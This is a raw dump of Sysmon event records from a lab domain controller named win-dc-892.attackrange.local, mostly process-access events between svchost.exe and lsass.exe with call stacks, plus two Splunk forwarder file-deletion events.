12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.063{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.063{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.047{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F9915113AF17DC8DCE67FF6FEDF38D5,SHA256=26FC0450041584141A2177B31E721185CE5AB4C0C1CB1C2BE25D91D382BEC8A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.047{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=61AA8A8B7993894FF54408648292ECEE,SHA256=4A70BA3DA8ACE682D138A3F829A457BF013371E936FD391D7E1198D5B3938FAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 